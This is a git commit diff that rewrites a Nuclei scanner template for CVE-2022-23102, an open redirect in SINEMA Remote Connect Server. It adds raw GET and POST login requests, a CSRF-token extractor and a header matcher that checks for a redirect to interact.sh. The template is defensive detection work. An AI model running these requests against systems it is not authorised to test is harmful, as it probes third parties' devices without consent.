re-write template

Added additional req, matchers and info
patch-1
Ritik Chaddha 2023-07-21 18:40:36 +05:30 committed by GitHub
parent 150475424a
commit 7717133cf9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 5 deletions

View File

@ -1,7 +1,7 @@
id: CVE-2022-23102 id: CVE-2022-23102
info: info:
name: SINEMA Remote Connect Server < V2.0 - Open Redirect name: SINEMA Remote Connect Server < V2.0 - Open Redirect
author: ctflearner author: ctflearner,ritikchaddha
severity: medium severity: medium
description: | description: |
A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks. A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.
@ -22,12 +22,31 @@ info:
tags: cve,cve2022,redirect,sinema tags: cve,cve2022,redirect,sinema
http: http:
- method: GET - raw:
path: - |
- "{{BaseURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh" GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
Host: {{Hostname}}
- |
POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: csrftoken={{csrf}};
Referer: {{BaseURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh
csrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}
matchers: matchers:
- type: regex - type: regex
part: header part: header_2
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- "name='csrfmiddlewaretoken' value='(.*)' />"
internal: true